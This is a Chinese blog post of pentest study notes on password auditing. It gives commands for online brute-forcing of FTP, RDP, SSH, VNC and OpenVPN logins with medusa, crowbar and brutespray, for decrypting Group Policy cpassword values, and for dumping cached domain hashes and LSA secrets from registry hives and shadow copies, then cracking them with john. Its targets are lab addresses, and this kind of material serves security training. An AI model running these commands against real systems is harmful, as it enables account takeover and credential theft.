用户口令审计2-爱代码爱编程
目录
medusa在线密码破解工具
支持多种常见协议(身份认证)
medusa -d #模块列表(支持协议)
medusa -M ftp -q #查看模块参数
medusa -M ftp -m MODE:EXPLICIT
指定目标
-h #单一目标
-H #目标列表文件
-C file.txt #host:user:password
-n #非标准端口
账号/密码
-u #指定用户名
-U #用户名字典
-p #指定密码
-P #密码字典
-e[n/s/ns] #n空密码、S密码与用户名相
其他
-O #保存扫描结果
-s #SSL
-v/-W #显示详细[0-6] / debug [0-10]
速度控制
-g #连接超时时间(默认3秒)
-r #重试间隔时间(默认3秒)
-R #重试次数(不包含首次)
-t #每主机并发数
-T #并发主机数
-f #每主机首破成功后退出
-F #所有主机首破成功后退出
gpp-decrypt-域策略审计
Windows域
- 安全边界(域内互信)
- 集中身份认证和资源管理
- 组策略对象PGO (通过XML下发)
- Windows server 2008增加了20多个组策略首选项
- 设置客户端用户名密码
- 文件夹选项、映射驱动器、打印机、服务、开始菜单、计划任务等
- 颗粒度更加细化(强制、非强制)
- XP、2003可通过安装客户端程序支持
- 设置密码通过AES加密
- 加密密钥被微软开发者站点泄漏
- https://msdn.microsoft.com/en-us/library/2c15cbf0 -f086 4c74-8b70- 1f2fa45dd4be(prot.20).aspx
- 域内所有用户都可以查看GPO中密文( cpassword )
- 使用密钥解密即可获得密码
- gpp-decrypt即为解密工具
-
\\lab.com\SYSVOLlab.com\Polices\{123a-123b-123c}\MACHINE\Preferences\Groups\Groups.xml 本地缓存 C:\ProgramData\Microsoft\Group Policy\History\{123c-123b-123c}Machine\Preferences\Groups\Groups.xml gpp-decrypt tL5ua5jOSKTyyD5fneuMrA
crowbar-在线密码破解工具
支持协议
- OpenVPN (-b openvpn)
- RDP with NLA support (-b rdp)
- SSH private key authentication (-b sshkey)
- VNC key authentication (-b vpn)
指定目标
-s:单个目标( CIDR )
-S:目标字典文件
-p:指定非标准端口
-b:服务类型( openvpn, rdp, sshkey, vnckey )
用户名/字典
-u:单个用户名
-U:用户名字典文件
-c:单个密码
-C:密码字典文件
密钥/日志
-m: OpenVPN配置文件
-k:密钥文件/文件夹( SSH、VNC)
-l:保存日志文件(默认./crowbar.log)
-o:保存成功结果(默认./crowbar.out)
其他
-n:线程数
-t:超时时间
-q:安静模式(只显示成功结果)
-D: debug模式
-v:详细信息
crowbar -b rdp -u LAB\zhangsan -C Aa123456 -S 1.1.1.1/32
zhangsan@lab.com
crowbar -b sshkey -s 1.1.1.1/32 -u root -k /root/.ssh/id_rsa
ssh-keygen -t rsa -b 4096
ssh-copy-id yuanfh@1.1.1.1
crowbar -b vnckey -s 1.1.1.1/32 -p 5902 -k /root/.vnc/passwd
crowbar -b openvpn -s 1.1.1.1/32 -m vpnbook.ovpn -k
vpnbook ca.crt -u ypnbook -C pass.lst
ssh
ssh-keygen -t rsa -b 4096 #生成ssh公私钥
ls /root/.ssh/
ssh-copy-id msfadmin@192.168.0.108 #公钥传到msfadmin主机
crowbar -b sshkey -s 192.168.0.108/32 -u msfadmin -k /root/.ssh/id_rsa
brutespray在线密码破解工具
基于NMAP扫描报告自动进行密码爆破
- 内建字典/指定账号、密码
- 读取gnmap / xml格式报告
- 可自动识别非标准端口服务( NMAP使用-sV参数)
- 密码破解通过调用medusa实现
nmap -p21,22,23 1.1.1.1 -sV -oA scan
brutespray -f scan.gnmap
参数
-u/-U #用户名/用户名字典
-p/-P #密码/密码字典
-t/-T #并发线程数/并发主机数
-s #指定服务类型
-o #输出结果目录
-i #交互模式
polenum-组策略枚举
Windows系统密码策略枚举工具,前提是已经掌握密码
polenum msfadmin:msfadmin@192.168.0.108 --protocols 139/SMB
polenum -u msfadmin -p msfadmin -d 192.168.0.108 --protocols 139/SMB
rsmangler-自定义字典
- 纯暴力密码的效率太低(计算能力)
- 人们构造密码的习惯
- 姓名(自己/亲人/偶像/宠物)、爱好、专业、称谓、生日的组合变形
Rsmangler字典生成器
- 基于有限数量的基本单词进行变形
- 基本单词数量一般不超过5个(变形数量巨大)
rsmangler -f c.txt -m 5 -x 8 > result.txt #将c.txt的基本单词进行变形,最长8,最短5
cachedump_lsadump-Windows认证提取
AD活动目录域本地缓存域身份认证信息
默认缓存10个身分验证信息 #DC离线时认证登陆
\HKLM\SECURITY\Cache #管理员没有访问权限(system)
读取缓存的身份验证信息(加密的HASH)
读取的是账号密码的HASH(没有名文密码)
1.kali Live引导
在Windows上挂载kali镜像
fdisk -l
mount /dev/sda1 /mnt/
cd /mnt/Windows/System32/config
cachedump SYSTEM SECURITY
Kali上的cachedump有问题,可以github下载
git clone https://github.com/Neohapsis/creddump7.git
root@kali:~/creddump7# ./cachedump.py /mnt/Windows/System32/config/SYSTEM /mnt /Windows/System32/config/SECURITY true
密码破解
john --format=mscash2 --wordlist=pass.txt cred.txt
2.卷影副本VSS
https://github.com/reider-roque/pentest-tools
cscript vssown.vbs /list /status /mode /create /delete
cscript vssown.vbs /create #创建卷影副本
copy \\?GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY . #拷贝副本
copy \\?GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
3.lsadump
LSA:Local Security Authority 注册表中一个存储机密数据的区域
\HKLM\Security\Policy\Secrets 个人设置的服务运行账号、自动启动密码、拨号、VPN SMB等存储密码
sundll32.exe keymgr.dll,KRShowKeyMgr
lsadump读取其中保存的密码
lsadump SYSTEM SECURITY true
root@kali:~/creddump7# ./lsadump.py /mnt/Windows/System32/config/SYSTEM /mnt/Windows/System32/config/SECURITY true
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/qq_34640691/article/details/110382452